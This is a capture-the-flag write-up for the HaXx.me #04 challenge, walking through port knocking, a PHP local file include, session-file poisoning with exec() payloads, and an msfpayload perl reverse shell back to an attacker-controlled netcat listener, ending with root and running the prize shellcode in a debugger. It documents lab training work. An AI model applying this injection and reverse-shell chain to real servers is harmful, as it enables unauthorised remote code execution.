@flagitiouslogic’s

HaXx.me #04
haxlog
1) The Main Gateway

The game starts with the web page shown above. The clue asks for a text record for 127.0.0.1 from me.

dig @haxxme.intern0t.net -x 127.0.0.1 –t txt

Next a text record for theninja domain is asked for
dig @haxxme.intern0t.net thninja –t txt

The Secret Ninja Code maybe ascii.

41 = A
65 = e
51=NAK????
Maybe not.
Moving on, connecting to the root of the web server the page below is returned.

The htmlcomments might be a hint, along with the web server reporting back as fake404.intern0t.net. The hint from
theninja text record stated, go to the default webpage of the web server.
The page that is returned when requesting index.html from the root of the web server looks similar to the page
returned for the root of the web server. One difference is the server name returned is not fake404.intern0t.net.
checking the traffic in fiddler2 shows the following.

Turns out that the page returned from the root of the webserver is not a 404, its also 721 bytes larger than a acutal 404
Scrolling to the bottom of the fake 404 page the following html comment is shown.
<!--01011001 01101111 01110101 00100000 01101011 01101110 01101111
01110111 00101100 00100000 01101001 01100110 00100000 01111001
01101111 01110101 00100111 01110010 01100101 00100000 01110011
01110100 01110101 01100011 01101011 00100000 01101111 01101110
00100000 01110100 01101000 01100101 00100000 01101110 01110101
01101101 01100010 01100101 01110010 01110011 00101100 00100000
01110100 01110010 01111001 00100000 01101011 01101110 01101111
01100011 01101011 01101001 01101110 01100111 00100001-->
Converting from binary to ASCII the above is translated into
“You know, if you're stuck on the numbers, try knocking!”

The A simple nmap scan shows that 53 and 80 are open ports. With ports 1, 3306, and 31337 being filtered
The ninja code could be a port knocking sequence? Try running the knock client against the server

After running the knock sequence a rescan from nmap shows that port 31337 is now open

2) The Ninja

Connecting to port 31337 the above page is returned.

Include /etc/ninja? A look at the source for this page may offer a deeper insight
A quick check of the source shows the comment <!- -include ($input) // input is a registered global - ->

Setting input to /etc/ninja

Returns a page with the new Secret Ninja Code of

SW4gb3JkZXIgdG8gZW50ZXIgdGhlIGJhc2UsIE9uZSBtdXN0IHVzZSB0aGUgZm9sbG93aW5nIG
NvZGU6IDEwMTAxLDExMDEwLDEwMTEx
This is base64 for the following:
In order to enter the base, One must use the following code: 10101,11010,10111
Running the knock client against the server using the new sequence of numbers

A rescan with nmap shows that port 1 on the server is now open

3) The Base

Connecting to the server on port 1 the above page is returned.

A WarGames referrence mixed in with a TRON theme and ninja refences throughout? OK my hax0r Cliché limit may
have been hit. Anyway password is Joshua
3) Border Control

Next logged in using the given credentials

4) The Final Destination

The Final Destination page has a link to tarball that contains the source for baselogin.php (border control login) and
controlroom.php (The Final Destination) pages.

A quick review shows that the board control login page(baselogin.php) uses guest and pass as hardcoded credentials
and when they are used the page redirects to the controlroom.php
Moving on to the controlroom.php page source, the following list of ASCII (in hex) is listed in another html comment that
appears to be a hint.

\x53\x65\x73\x73\x69\x6f\x6e\x20\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x3a\x20\x2f\x76\x61\x72\x2f\x6c\x69\
x62\x2f\x70\x68\x70\x35\x2f
Dumping the hex in tiny hexer show the following ASCII

Next the source shows that the user variable is included by the php code.

It would seem the page is vulnerable to a local file include and the php session directory is /var/lib/php5/

Grab the PHPSESSID and set the user variable to the session file as shown below
Setting the php session password variable to <?php echo exec('whoami');?> using the baseindex.php page and then
reloading the controlroom.php page with the user variable set as the session file shows the following info

It would seem the web server is running as www-data.

Setting the php session password variable to <?php echo exec('which perl'); ?> using the baseindex.php page and then
reloading the controlroom.php page with the user variable set as the session file shows the following info

It would seem that perl is available. Using the following msfpayload command a perl reverse shell can be built
msfpayload php/reverse_perl LHOST=MYIP LPORT=2024 R
Then setup a netcat listener on a attacker controlled machine.

After which setting the php session password variable to the output of the msfpayload command wrapped in php tags
using the baseindex.php page and then reloading the controlroom.php page with the user variable set as then session
file
shell access as www-data . A process list shown below divulges a netcat listener running as root. Well that was easy.

Nice! That’s root on the server.

Below shows the content of the winning-key.txt file

Next dump the shellcode from the text file to a bin file and then use msfencode to build a exe quick

msfencode -e generic/none -a x86 -p windows -t exe -o final.exe < final.bin

Then load the exe into a debugger and search to find the first four bytes.
Use the debugger to set OEP to the address of the start of the shellcode

As the shellcode is all inside of the text segment it will need to be set to full access.

Set a breakpoint at the end of the shellcode

Last step run the shellcode in the debugger and reap the reward

I cracked the HaXx.Me #04 challenge and I shouldn't just be proud, I

should be proud like hell because it was the hardest of them all!